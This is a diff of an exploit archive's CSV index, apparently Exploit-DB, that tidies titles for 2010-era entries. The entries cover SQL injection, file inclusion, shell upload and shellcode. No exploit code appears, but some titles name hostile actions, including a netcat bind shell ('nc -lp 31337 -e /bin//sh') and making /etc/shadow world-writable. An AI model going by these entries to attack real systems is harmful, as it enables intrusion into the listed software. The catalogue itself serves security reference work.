XSS",2010-06-17,hexon,php,webapps,0 13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) & chmod (_/etc/passwd__ 0777) & exit(0) shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 - (print&sid) SQL Injection",2010-06-17,Gamoscu,php,webapps,0 13918,platforms/multiple/webapps/13918.txt,"Spring Framework arbitrary code execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0 @@ -12271,7 +12271,7 @@ id,file,description,date,author,platform,type,port 13929,platforms/php/webapps/13929.txt,"Banner Management Script SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 13931,platforms/php/webapps/13931.txt,"Kubelance SQL Injection (profile.php?id)",2010-06-18,"L0rd CrusAd3r",php,webapps,0 -13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server <= 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0 +13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0 13933,platforms/php/webapps/13933.txt,"UK One Media CMS (id) Error Based SQL Injection",2010-06-19,LiquidWorm,php,webapps,0 13934,platforms/windows/dos/13934.py,"MoreAmp - (.maf) Buffer Overflow PoC",2010-06-19,Sid3^effects,windows,dos,0 13935,platforms/php/webapps/13935.txt,"Joomla Component RSComments 1.0.0 Persistent XSS",2010-06-19,jdc,php,webapps,0 @@ -12293,22 +12293,22 @@ id,file,description,date,author,platform,type,port 13952,platforms/php/webapps/13952.txt,"Saffa Tunes CMS (news.php) SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0 13954,platforms/php/webapps/13954.txt,"G.CMS Generator SQL Injection",2010-06-21,Sid3^effects,php,webapps,0 13955,platforms/php/webapps/13955.txt,"Joomla Template BizWeb com_community Persistent XSS",2010-06-21,Sid3^effects,php,webapps,0 -13956,platforms/php/webapps/13956.txt,"Joomla Hot Property com_jomestate - RFI",2010-06-21,Sid3^effects,php,webapps,0 -13957,platforms/php/webapps/13957.txt,"myUPB <= 2.2.6 - Multiple Vulnerabilities",2010-06-21,"ALTBTA ",php,webapps,0 +13956,platforms/php/webapps/13956.txt,"Joomla Hot Property com_jomestate - Remote File Inclusion",2010-06-21,Sid3^effects,php,webapps,0 +13957,platforms/php/webapps/13957.txt,"myUPB 2.2.6 - Multiple Vulnerabilities",2010-06-21,"ALTBTA ",php,webapps,0 13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 - (SFTP Module) Multiple Commands DoS Vulnerabilities",2010-06-21,leinakesi,windows,dos,0 -13959,platforms/windows/dos/13959.c,"teamspeak <= 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 +13959,platforms/windows/dos/13959.c,"teamspeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 14363,platforms/php/webapps/14363.txt,"Ad Network Script Persistent XSS",2010-07-14,Sid3^effects,php,webapps,0 14359,platforms/php/webapps/14359.html,"Zenphoto CMS 1.3 - Multiple CSRF Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0 14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0 13960,platforms/php/webapps/13960.html,"PHPWCMS 1.4.5 r398 - Cross-Site Request Forgery",2010-06-21,"Jeremiah Talamantes",php,webapps,0 13961,platforms/php/webapps/13961.txt,"Alpin CMS 1.0 - SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0 13962,platforms/php/webapps/13962.txt,"Joomla Component JomSocial 1.6.288 - Multiple XSS",2010-06-21,jdc,php,webapps,0 -13964,platforms/php/webapps/13964.txt,"Linker IMG <= 1.0 - Remote File Inclusion",2010-06-21,"Sn!pEr.S!Te Hacker",php,webapps,0 +13964,platforms/php/webapps/13964.txt,"Linker IMG 1.0 - Remote File Inclusion",2010-06-21,"Sn!pEr.S!Te Hacker",php,webapps,0 13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - SEH PoC",2010-06-22,blake,windows,dos,0 13966,platforms/php/webapps/13966.txt,"The Uploader 2.0.4 - Remote File Disclosure",2010-06-22,Xa7m3d,php,webapps,0 13967,platforms/php/webapps/13967.txt,"Online Classified System Script SQL Injection and XSS Vulnerabilities",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13969,platforms/php/webapps/13969.txt,"Job Search Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 -13970,platforms/php/webapps/13970.txt,"Video Community portal SQLi and XSS Vulnerable",2010-06-22,"L0rd CrusAd3r",php,webapps,0 +13970,platforms/php/webapps/13970.txt,"Video Community portal - SQLi and XSS Vulnerable",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13971,platforms/php/webapps/13971.txt,"Classifieds Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13973,platforms/php/webapps/13973.txt,"Hot or Not Picture Rating Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13975,platforms/php/webapps/13975.txt,"Webring Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 @@ -12322,7 +12322,7 @@ id,file,description,date,author,platform,type,port 13983,platforms/php/webapps/13983.txt,"Greeting card 1.1 - SQL Injection",2010-06-22,Net.Edit0r,php,webapps,0 13986,platforms/php/webapps/13986.txt,"Softbiz Resource Repository Script Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 13987,platforms/php/webapps/13987.txt,"Pre Multi-Vendor Shopping Malls SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 -13988,platforms/php/webapps/13988.txt,"PHP Event Calendar <= 1.5 - Multiple Vulnerabilities",2010-06-22,"cp77fk4r ",php,webapps,0 +13988,platforms/php/webapps/13988.txt,"PHP Event Calendar 1.5 - Multiple Vulnerabilities",2010-06-22,"cp77fk4r ",php,webapps,0 13990,platforms/asp/webapps/13990.txt,"Boat Classifieds SQL Injection",2010-06-22,Sangteamtham,asp,webapps,0 13991,platforms/php/webapps/13991.txt,"Softbiz PHP FAQ Script Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 13992,platforms/php/webapps/13992.txt,"Pre PHP Classifieds SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 @@ -12357,7 +12357,7 @@ id,file,description,date,author,platform,type,port 14027,platforms/php/webapps/14027.txt,"ActiveCollab 2.3.0 - Local File Inclusion / Directory Traversal",2010-06-24,"Jose Carlos de Arriba",php,webapps,0 14028,platforms/php/webapps/14028.txt,"2DayBiz B2B Portal Script - SQL Injection",2010-06-24,JaMbA,php,webapps,0 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 -14030,platforms/asp/webapps/14030.pl,"phportal_1.2 - (gunaysoft.php) Remote File Include",2010-06-24,Ma3sTr0-Dz,asp,webapps,0 +14030,platforms/asp/webapps/14030.pl,"phportal_1.2 - (gunaysoft.php) Remote File Inclusion",2010-06-24,Ma3sTr0-Dz,asp,webapps,0 14032,platforms/windows/dos/14032.pl,"Winstats (.fma) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 14033,platforms/php/webapps/14033.txt,"Big Forum 5.2v Arbitrary File Upload & LFI",2010-06-24,"Zer0 Thunder",php,webapps,0 14035,platforms/php/webapps/14035.txt,"Big Forum SQL Injection (forum.php?id)",2010-06-24,JaMbA,php,webapps,0 @@ -12374,13 +12374,13 @@ id,file,description,date,author,platform,type,port 14052,platforms/windows/shellcode/14052.c,"Windows - WinExec cmd.exe + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,windows,shellcode,0 14053,platforms/php/webapps/14053.txt,"snipe gallery Script SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0 14054,platforms/php/webapps/14054.txt,"Joomla Component JE Story Submit SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps,0 -14055,platforms/php/webapps/14055.txt,"Joomla Component (com_sef) - RFI",2010-06-26,Li0n-PaL,php,webapps,0 +14055,platforms/php/webapps/14055.txt,"Joomla Component (com_sef) - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0 14056,platforms/php/webapps/14056.txt,"Clicker CMS Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,php,webapps,0 14057,platforms/php/webapps/14057.txt,"WordPress Cimy Counter - Vulnerabilities",2010-06-26,sebug,php,webapps,0 14058,platforms/aix/webapps/14058.html,"PHP-Nuke 8.2 - Remote Upload File Exploit",2010-06-26,Net.Edit0r,aix,webapps,0 14059,platforms/php/webapps/14059.txt,"Joomla JE Awd Song Component Persistent XSS",2010-06-26,Sid3^effects,php,webapps,0 14060,platforms/php/webapps/14060.txt,"Joomla JE Media Player Component LFI",2010-06-26,Sid3^effects,php,webapps,0 -14085,platforms/php/webapps/14085.txt,"iNet Online Community Blind SQLi",2010-06-28,JaMbA,php,webapps,0 +14085,platforms/php/webapps/14085.txt,"iNet Online Community - Blind SQLi",2010-06-28,JaMbA,php,webapps,0 14266,platforms/windows/dos/14266.pl,"IrcDelphi Daemon Server Denial of Service",2010-07-08,Crash,windows,dos,6667 14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 - (buyupg.php) SQL Injection",2010-06-28,Dark.Man,php,webapps,0 14062,platforms/php/webapps/14062.txt,"Joomla JE Event Calendar LFI",2010-06-26,Sid3^effects,php,webapps,0 @@ -12404,7 +12404,7 @@ id,file,description,date,author,platform,type,port 14089,platforms/php/webapps/14089.txt,"PageDirector CMS - Multiple Vulnerabilities",2010-06-28,Tr0y-x,php,webapps,0 14097,platforms/arm/shellcode/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",arm,shellcode,0 14091,platforms/osx/remote/14091.py,"UFO: Alien Invasion 2.2.1 - Remote Code Execution (OSX)",2010-06-28,dookie,osx,remote,0 -14094,platforms/php/webapps/14094.txt,"Netartmedia iBoutique.MALL SQLi",2010-06-28,Sid3^effects,php,webapps,0 +14094,platforms/php/webapps/14094.txt,"Netartmedia iBoutique.MALL - SQLi",2010-06-28,Sid3^effects,php,webapps,0 14095,platforms/php/webapps/14095.txt,"I-net Multi User Email Script - SQLi",2010-06-28,Sid3^effects,php,webapps,0 14096,platforms/php/webapps/14096.html,"CMSQlite & CMySQLite 1.3 - CSRF",2010-06-28,"ADEO Security",php,webapps,0 14295,platforms/windows/dos/14295.html,"Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak (0Day)",2010-07-09,"Ruben Santamarta ",windows,dos,0 @@ -12412,7 +12412,7 @@ id,file,description,date,author,platform,type,port 14099,platforms/windows/dos/14099.py,"MemDb - Multiple Remote DoS",2010-06-28,Markot,windows,dos,80 14106,platforms/php/webapps/14106.txt,"PHPDirector 0.30 - (videos.php) SQL Injection",2010-06-29,Mr-AbdoX,php,webapps,0 14107,platforms/php/webapps/14107.txt,"YPNinc JokeScript (ypncat_id) SQL Injection",2010-06-29,v3n0m,php,webapps,0 -14104,platforms/multiple/webapps/14104.txt,"Ecomat CMS Remote SQL Injection",2010-06-29,"High-Tech Bridge SA",multiple,webapps,0 +14104,platforms/multiple/webapps/14104.txt,"Ecomat CMS SQL Injection",2010-06-29,"High-Tech Bridge SA",multiple,webapps,0 14101,platforms/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,multiple,webapps,80 14102,platforms/windows/dos/14102.py,"Winamp 5.571 - (.avi) Denial of Service",2010-06-28,"Praveen Darshanam",windows,dos,0 14103,platforms/multiple/webapps/14103.txt,"Applicure DotDefender 4.01-3 - Persistent XSS",2010-06-28,EnableSecurity,multiple,webapps,80 @@ -12421,7 +12421,7 @@ id,file,description,date,author,platform,type,port 14111,platforms/php/webapps/14111.txt,"Allomani - Super Multimedia 2.5 - CSRF Add Admin Account",2010-06-29,G0D-F4Th3r,php,webapps,0 14112,platforms/php/webapps/14112.txt,"PageDirector CMS (result.php) SQL Injection",2010-06-29,v3n0m,php,webapps,0 14115,platforms/windows/webapps/14115.txt,"Gekko CMS (SQL Injection)",2010-06-29,[]0iZy5,windows,webapps,80 -14117,platforms/multiple/webapps/14117.txt,"CubeCart PHP (shipkey parameter) <= 4.3.x - Remote SQL Injection",2010-06-29,"Core Security",multiple,webapps,80 +14117,platforms/multiple/webapps/14117.txt,"CubeCart PHP (shipkey parameter) <= 4.3.x - SQL Injection",2010-06-29,"Core Security",multiple,webapps,80 30100,platforms/windows/remote/30100.html,"British Telecommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities",2007-05-29,"Will Dormann",windows,remote,0 14118,platforms/multiple/webapps/14118.txt,"LIOOSYS CMS (news.php) SQL Injection",2010-06-29,GlaDiaT0R,multiple,webapps,80 14119,platforms/lin_x86/shellcode/14119.c,"Linux/x86 - Polymorphic /bin/sh shellcode (116 bytes)",2010-06-29,gunslinger_,lin_x86,shellcode,0 @@ -12430,11 +12430,11 @@ id,file,description,date,author,platform,type,port 14121,platforms/multiple/dos/14121.c,"Adobe Reader 9.3.2 - (CoolType.dll) Remote Memory Corruption / DoS",2010-06-29,LiquidWorm,multiple,dos,0 14122,platforms/arm/shellcode/14122.txt,"Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",arm,shellcode,0 14123,platforms/php/webapps/14123.txt,"WebDM CMS SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -14124,platforms/php/webapps/14124.pl,"PHP-Nuke <= 8.0 - Remote SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 -14125,platforms/php/webapps/14125.pl,"ShopCartDx <= 4.30 - (products.php) Blind SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 +14124,platforms/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 +14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - (products.php) Blind SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 14126,platforms/php/webapps/14126.txt,"joomla component gamesbox com_gamesbox 1.0.2 - (id) SQL Injection",2010-06-30,v3n0m,php,webapps,0 14127,platforms/php/webapps/14127.txt,"Joomla Joomanager SQL Injection",2010-06-30,Sid3^effects,php,webapps,0 -14141,platforms/php/webapps/14141.pl,"Oxygen2PHP <= 1.1.3 - (member.php) SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 +14141,platforms/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - (member.php) SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 14132,platforms/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps,0 14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0 14144,platforms/php/webapps/14144.txt,"Specialist Bed and Breakfast Website SQL Injection",2010-06-30,JaMbA,php,webapps,0 @@ -12443,8 +12443,8 @@ id,file,description,date,author,platform,type,port 14147,platforms/php/webapps/14147.txt,"NinkoBB CSRF",2010-07-01,"ADEO Security",php,webapps,0 14149,platforms/asp/webapps/14149.txt,"Setiran CMS Blind SQL Injection",2010-07-01,"Th3 RDX",asp,webapps,0 14150,platforms/windows/local/14150.pl,"RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR and DEP Bypass)",2010-07-01,Node,windows,local,0 -14151,platforms/php/webapps/14151.pl,"Oxygen2PHP <= 1.1.3 - (post.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0 -14152,platforms/php/webapps/14152.pl,"Oxygen2PHP <= 1.1.3 - (forumdisplay.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0 +14151,platforms/php/webapps/14151.pl,"Oxygen2PHP 1.1.3 - (post.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0 +14152,platforms/php/webapps/14152.pl,"Oxygen2PHP 1.1.3 - (forumdisplay.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0 14153,platforms/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,Madjix,windows,local,0 14154,platforms/php/webapps/14154.txt,"Joomla Component com_dateconverter 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0 14155,platforms/asp/webapps/14155.txt,"SIDA University System SQL Injection",2010-07-01,K053,asp,webapps,0 @@ -12520,16 +12520,16 @@ id,file,description,date,author,platform,type,port 14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface DoS",2010-07-06,muts,windows,dos,8800 14235,platforms/linux/shellcode/14235.c,"Linux - _nc -lp 31337 -e /bin//sh_ polymorphic shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14237,platforms/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web application vulnerabilities",2010-07-06,"Alexey Sintsov",php,webapps,0 -14238,platforms/php/webapps/14238.txt,"BS Auction <= SQL Injection Exploit",2010-07-06,"Easy Laster",php,webapps,0 -14239,platforms/php/webapps/14239.txt,"Auto Dealer <= SQL Injection Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 +14238,platforms/php/webapps/14238.txt,"BS Auction SQL Injection Exploit",2010-07-06,"Easy Laster",php,webapps,0 +14239,platforms/php/webapps/14239.txt,"Auto Dealer SQL Injection Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 14240,platforms/php/webapps/14240.txt,"BS Auto Classifieds (info.php) SQL Injection Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 14241,platforms/php/webapps/14241.txt,"BS Business Directory (articlesdetails.php) SQL Injection Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 14242,platforms/php/webapps/14242.txt,"BS Classifieds Ads (articlesdetails.php) SQL Injection Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 14243,platforms/php/webapps/14243.txt,"BS Events Directory (articlesdetails.php) SQL Injection Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 14244,platforms/php/webapps/14244.txt,"Lyrics 3.0 - Engine SQL Injection",2010-07-06,Sid3^effects,php,webapps,0 -14245,platforms/php/webapps/14245.txt,"Pre Multi-Vendor Shopping Malls SQL Injection & Auth Bypass Vulnerabilty",2010-07-06,**RoAd_KiLlEr**,php,webapps,0 +14245,platforms/php/webapps/14245.txt,"Pre Multi-Vendor Shopping Malls SQL Injection & Auth Bypass",2010-07-06,**RoAd_KiLlEr**,php,webapps,0 14248,platforms/windows/remote/14248.py,"minerCPP 0.4b Remote BOF+Format String Attack Exploit",2010-07-06,l3D,windows,remote,0 -14249,platforms/php/webapps/14249.txt,"Joomla com_autartimonial Sqli",2010-07-06,Sid3^effects,php,webapps,0 +14249,platforms/php/webapps/14249.txt,"Joomla com_autartimonial - SQLi",2010-07-06,Sid3^effects,php,webapps,0 14251,platforms/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection",2010-07-06,S.W.T,php,webapps,0 14254,platforms/osx/remote/14254.py,"EvoCam Web Server OS X ROP Remote Exploit (Snow Leopard)",2010-07-06,d1dn0t,osx,remote,0 14285,platforms/windows/webapps/14285.txt,"Outlook Web Access 2007 - CSRF",2010-07-08,"Rosario Valotta",windows,webapps,0 @@ -12551,12 +12551,12 @@ id,file,description,date,author,platform,type,port 14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 - IRC Client Remote Code Execution - OS X Snow Leopard (ROP)",2010-07-08,d1dn0t,osx,remote,0 14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 - (0Day)",2010-07-08,webDEViL,windows,remote,0 14276,platforms/linux/shellcode/14276.c,"Linux - Find all writeable folder in filesystem polymorphic shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0 -14277,platforms/php/webapps/14277.txt,"Inout Music 1.0 - Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 -14278,platforms/php/webapps/14278.txt,"Inout Article Base Ultimate Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 -14279,platforms/php/webapps/14279.txt,"Inout Ad server Ultimate Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 -14280,platforms/php/webapps/14280.txt,"PG Social Networking Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 +14277,platforms/php/webapps/14277.txt,"Inout Music 1.0 - Shell Upload",2010-07-08,SONIC,php,webapps,0 +14278,platforms/php/webapps/14278.txt,"Inout Article Base Ultimate - Shell Upload",2010-07-08,SONIC,php,webapps,0 +14279,platforms/php/webapps/14279.txt,"Inout Ad server Ultimate - Shell Upload",2010-07-08,SONIC,php,webapps,0 +14280,platforms/php/webapps/14280.txt,"PG Social Networking - Shell Upload",2010-07-08,SONIC,php,webapps,0 14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0 -14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0 +14281,platforms/asp/webapps/14281.txt,"KMSoft GB - SQL Injection",2010-07-08,SONIC,asp,webapps,0 14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0 14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection",2010-07-08,SONIC,asp,webapps,0 14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerabilities",2010-07-08,SONIC,asp,webapps,0 @@ -12565,24 +12565,24 @@ id,file,description,date,author,platform,type,port 14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0 14290,platforms/windows/dos/14290.py,"MP3 Cutter 1.5 - DoS Exploit",2010-07-09,"Prashant Uniyal",windows,dos,0 14293,platforms/php/webapps/14293.txt,"Minify4Joomla Upload and Persistent XSS",2010-07-09,Sid3^effects,php,webapps,0 -14291,platforms/php/webapps/14291.txt,"IXXO Cart for Joomla SQLi",2010-07-09,Sid3^effects,php,webapps,0 +14291,platforms/php/webapps/14291.txt,"IXXO Cart for Joomla - SQLi",2010-07-09,Sid3^effects,php,webapps,0 14434,platforms/php/webapps/14434.txt,"Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0 14312,platforms/php/webapps/14312.txt,"Joomla redSHOP Component 1.0 (com_redshop pid) - SQL Injection",2010-07-10,v3n0m,php,webapps,0 14296,platforms/php/webapps/14296.txt,"Joomla QuickFAQ Component (com_quickfaq) Blind SQL Injection",2010-07-09,RoAd_KiLlEr,php,webapps,0 -14316,platforms/php/webapps/14316.pl,"PHP-Nuke <= 8.0 - (Web_Links Module) Remote Blind SQL Injection Exploit",2010-07-10,yawn,php,webapps,0 +14316,platforms/php/webapps/14316.pl,"PHP-Nuke 8.0 - (Web_Links Module) Remote Blind SQL Injection Exploit",2010-07-10,yawn,php,webapps,0 14299,platforms/php/webapps/14299.txt,"CMS Contentia (news.php) SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0 14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0 14306,platforms/php/webapps/14306.txt,"HoloCMS 9.0.47 - (news.php) SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0 14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0 14308,platforms/php/webapps/14308.txt,"WordPress Firestats - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0 15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS",2010-10-23,d0lc3,windows,dos,0 -14310,platforms/php/webapps/14310.js,"DotDefender <= 3.8-5 - No Authentication Remote Code Execution Through XSS",2010-07-09,rAWjAW,php,webapps,80 +14310,platforms/php/webapps/14310.js,"DotDefender 3.8-5 - No Authentication Remote Code Execution Through XSS",2010-07-09,rAWjAW,php,webapps,80 14313,platforms/php/webapps/14313.txt,"Joomla MyHome Component (com_myhome) Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0 14315,platforms/php/webapps/14315.txt,"Joomla MySms Component (com_mysms) Upload",2010-07-10,Sid3^effects,php,webapps,0 14335,platforms/php/webapps/14335.txt,"Joomla Health & Fitness Stats Persistent XSS",2010-07-12,Sid3^effects,php,webapps,0 14318,platforms/php/webapps/14318.html,"Elite CMS 1.01 - Multiple XSS/CSRF Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 -14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0 -14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) - Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0 +14319,platforms/php/webapps/14319.pl,"PHP-Nuke 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0 +14320,platforms/php/webapps/14320.pl,"PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0 14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection",2010-07-10,v3n0m,php,webapps,0 @@ -12611,7 +12611,7 @@ id,file,description,date,author,platform,type,port 14361,platforms/windows/local/14361.py,"Microsoft Excel 0x5D record Stack Overflow",2010-07-14,webDEViL,windows,local,0 14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL Injection",2010-07-14,"High-Tech Bridge SA",php,webapps,0 14365,platforms/php/webapps/14365.txt,"Campsite CMS Remote Persistent XSS",2010-07-15,D4rk357,php,webapps,0 -14366,platforms/php/webapps/14366.txt,"Whizzy CMS <= 10.01 - Local File Inclusion",2010-07-15,"Anarchy Angel",php,webapps,0 +14366,platforms/php/webapps/14366.txt,"Whizzy CMS 10.01 - Local File Inclusion",2010-07-15,"Anarchy Angel",php,webapps,0 14368,platforms/php/webapps/14368.txt,"RedShop 1.0.23.1 Joomla Component Blind SQL Injection",2010-07-15,"Salvatore Fresta",php,webapps,0 14369,platforms/jsp/webapps/14369.txt,"ORACLE Business Process Management (Process Administrator) 5.7-6.0-10.3 - XSS",2010-07-15,Markot,jsp,webapps,0 14370,platforms/php/webapps/14370.txt,"BS Scripts Directory (info.php) SQL Injection",2010-07-15,D4rk357,php,webapps,0 @@ -12660,11 +12660,11 @@ id,file,description,date,author,platform,type,port 14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0 14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption Exploit",2010-07-20,"Elazar Broad",windows,remote,0 14419,platforms/asp/webapps/14419.txt,"Caner Hikaye Script SQL Injection",2010-07-20,v0calist,asp,webapps,0 -14422,platforms/multiple/dos/14422.c,"libpng <= 1.4.2 - Denial of Service",2010-07-20,kripthor,multiple,dos,0 +14422,platforms/multiple/dos/14422.c,"libpng 1.4.2 - Denial of Service",2010-07-20,kripthor,multiple,dos,0 14423,platforms/php/webapps/14423.txt,"Joomla Component com_spa SQL Injection",2010-07-20,"ALTBTA ",php,webapps,0 14424,platforms/windows/dos/14424.txt,"Lithtech Engine - Memory Corruption",2010-07-20,"Luigi Auriemma",windows,dos,0 14425,platforms/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat Remote File Inclusion",2010-07-20,"HaCkEr arar",php,webapps,0 -14426,platforms/php/webapps/14426.pl,"Imagine-cms <= 2.50 SQL Injection Exploit",2010-07-21,Metropolis,php,webapps,0 +14426,platforms/php/webapps/14426.pl,"Imagine-cms 2.50 SQL Injection Exploit",2010-07-21,Metropolis,php,webapps,0 14427,platforms/windows/webapps/14427.txt,"Outlook Web Access 2003 - CSRF",2010-07-21,anonymous,windows,webapps,0 14428,platforms/windows/local/14428.py,"QQPlayer asx File Processing Buffer Overflow Exploit",2010-07-21,"Li Qingshan",windows,local,0 14431,platforms/windows/local/14431.py,"QQPlayer cue File Buffer Overflow Exploit",2010-07-21,"Lufeng Li",windows,local,0 @@ -12707,7 +12707,7 @@ id,file,description,date,author,platform,type,port 14470,platforms/php/webapps/14470.txt,"Ballettin Forum SQL Injection",2010-07-25,3v0,php,webapps,0 14471,platforms/php/webapps/14471.txt,"CMS Ignition SQL Injection Exploit",2010-07-25,neavorc,php,webapps,0 14472,platforms/php/webapps/14472.txt,"WhiteBoard 0.1.30 - Multiple Blind SQL Injection 